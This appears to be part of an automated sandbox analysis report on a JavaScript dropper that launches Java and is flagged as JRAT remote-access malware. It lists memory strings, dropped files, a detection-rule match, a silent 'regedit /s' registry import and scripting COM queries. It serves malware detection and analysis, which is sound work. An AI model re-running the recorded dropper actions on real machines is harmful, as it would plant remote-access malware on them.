Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimitKV
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
Source: java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager3)
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManagerP
Source: xcopy.exe, 00000012.00000003.1853919853.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sun.com.
Source: xcopy.exe, 00000012.00000003.1851469683.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/
Source: xcopy.exe, 00000012.00000003.1851469683.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/)
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.unicode.org/copyright.html
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTDKD
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/eam;
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespacesC
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validationS6
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/(
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/K%
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/nt(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-stringk
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/mborgerding/kissfft
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/LICENSE.txt
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/laodict.txt
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.io
Source: java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.io#
Source: java.exe, 00000004.00000002.2955123520.000000000A09B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.ioCX
Source: java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.ios
Source: xcopy.exe, 00000012.00000003.1851166047.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/MPL/2.0/.
Source: xcopy.exe, 00000012.00000003.1851166047.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/publicsuffix/list/3c213aab32b3c014f171b1673d4ce9b5cd72bf1c/public_
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sourceforge.net/project/?group_id=1519

System Summary

Source: C:\Users\user\AppData\Roaming\cmukyspiy.txt, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: ffjcext.zip.18.dr Zip Entry: {CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.js
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020E3758 1_2_020E3758
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021265D0 1_2_021265D0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020DE709 1_2_020DE709
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
Source: gcahfpmhcn.js Initial sample: Strings found which are bigger than 50
